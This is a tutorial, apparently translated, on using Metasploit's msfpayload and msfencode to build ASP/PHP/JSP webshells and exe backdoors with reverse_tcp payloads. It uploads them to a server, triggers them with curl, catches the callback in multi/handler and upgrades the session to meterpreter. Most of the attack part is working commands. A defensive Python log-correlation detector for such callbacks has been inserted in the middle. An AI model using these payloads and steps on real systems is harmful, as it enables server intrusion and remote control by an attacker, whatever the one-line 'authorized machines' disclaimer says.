The methods involved in this article can only be tested on authorized machines.
First, I suggest you look up how meterpreter is used online. Read this article to understand why msf is used for privilege escalation (because msf has meterpreter, which is very powerful ^_^).
Metasploit has two tools, msfpayload and msfencode. They generate not only exe-type backdoors but also webshells written in web scripting languages. After generating a webshell, you set up a listener and then access the webshell URL; with some luck, a session is returned for further use.
The specific usage is described below.
You can list the available payloads in msf with the corresponding command and note the one you need. Use the following command to generate a webshell; it is similar to the msfpayload usage shown earlier, except that a web script file is produced here:
Generate webshell
msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip R | msfencode -t asp -o webshell.asp
Then upload the webshell to the server (this step requires upload permission).
Then start msfconsole and enter:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp (the same payload that was passed to msfpayload above)
set LHOST your_ip
exploit
Then access the webshell URL, here using curl: curl http://www.bkjia.com/webshell.asp. If the exploit runs successfully, you will see a meterpreter shell returned in msfconsole. If you have not looked up how meterpreter is used online yet, there are plenty of references.
However, when I used netbox to set up an asp environment, I always ran into execution errors. I hope readers will verify this themselves before relying on it.
Besides asp webshells, php and jsp webshells can be generated the same way: the -t parameter of msfencode specifies the script type. I think the php webshell is easier to get working.
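From the defender's side, the webshell procedure above leaves a characteristic trace: a request for a script file in an upload directory, followed almost immediately by an outbound connection opened by the web server process (the reverse_tcp callback). The following is an added Python example, not code from the original article, that correlates those two events in constructed log data; the log formats, the /uploads/ directory, the script extensions, the process names and the 60-second window are assumptions.

```python
import re
from datetime import datetime

# Constructed sample data, not from the original article: a web access log in
# Common Log Format and a host sensor's outbound-connection log
# (timestamp, process, remote IP, remote port).
ACCESS_LOG = """\
203.0.113.9 - - [10/Oct/2023:13:55:01 +0000] "GET /index.asp HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2023:13:55:36 +0000] "GET /uploads/webshell.asp HTTP/1.1" 200 0
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 80213
"""
CONN_LOG = """\
2023-10-10T13:55:37Z w3wp.exe 203.0.113.9 4444
2023-10-10T13:57:30Z w3wp.exe 192.0.2.50 443
"""
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
SCRIPT_EXT = ('.asp', '.aspx', '.php', '.jsp')  # assumed: no scripts belong under uploads
UPLOAD_PREFIX = '/uploads/'                     # assumed upload directory
WEB_PROCS = {'w3wp.exe', 'httpd', 'apache2', 'nginx', 'php-fpm'}  # assumed server processes

def parse_access(line):
    """Return {src, time, path, status} for one access-log line, or None if unparsable."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    src, ts, _method, path, status = m.groups()
    return {'src': src, 'time': datetime.strptime(ts, '%d/%b/%Y:%H:%M:%S %z'),
            'path': path, 'status': int(status)}

def parse_conn(line):
    """Return {time, proc, rip, rport} for one connection-log line."""
    ts, proc, rip, rport = line.split()
    return {'time': datetime.fromisoformat(ts.replace('Z', '+00:00')),
            'proc': proc, 'rip': rip, 'rport': int(rport)}

def find_webshell_callbacks(access_text, conn_text, window_s=60):
    """Flag requests for a script file under the upload directory that are followed
    within window_s seconds by an outbound connection from a web server process."""
    hits = [h for h in map(parse_access, access_text.splitlines())
            if h and h['path'].startswith(UPLOAD_PREFIX)
            and h['path'].lower().endswith(SCRIPT_EXT)]
    conns = [parse_conn(l) for l in conn_text.splitlines() if l.strip()]
    alerts = []
    for h in hits:
        for c in conns:
            lag = (c['time'] - h['time']).total_seconds()
            if c['proc'] in WEB_PROCS and 0 <= lag <= window_s:
                alerts.append({'path': h['path'], 'src': h['src'],
                               'remote': f"{c['rip']}:{c['rport']}", 'lag_s': lag,
                               'same_host': c['rip'] == h['src']})  # callback to the requester
    return alerts
```

The same_host flag marks the case in this article, where the machine that requests the webshell is also the LHOST the server connects back to; a callback to a different host is still reported, only without that flag.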
In addition, if you have permission to upload files to the server and execute them, you can upload a backdoor generated by msfpayload, set up the listener, execute the backdoor to get a session back, and then upgrade that session to meterpreter, so that you can easily use meterpreter's various features. The steps are as follows (the prerequisites are as explained above):
1. msfpayload windows/shell_reverse_tcp LHOST=your_ip R | msfencode -t exe -o test.exe
2. Open msfconsole (in another terminal)
3. Set up the listener (listening sounds very advanced, don't be scared by it): use exploit/multi/handler, set LHOST your_ip, exploit
4. Upload test.exe to the server
5. Execute test.exe on the server, and a shell is returned.
6. Convert the windows shell to a meterpreter shell: because the payload used is shell_reverse_tcp, what the listener receives after the connection comes back is a windows shell (the Windows command prompt), not a meterpreter shell. To convert it, press Ctrl+Z to put the windows shell in the background, then run the sessions command to find the shell session's number,
then run sessions -u number (number is the windows shell session number you found). This produces a meterpreter shell, and the powerful functions of meterpreter can be used. An error may also occur; read the error message carefully and search part of it on Google.
Readers may have a question: since an exe file can be uploaded and executed, wouldn't it be more convenient to upload a powerful Trojan directly? I would like to say that msf has the powerful Meterpreter.
To sum up, give it a try. Some of the payloads in the payload list cannot be used, and some unexpected discoveries may be made.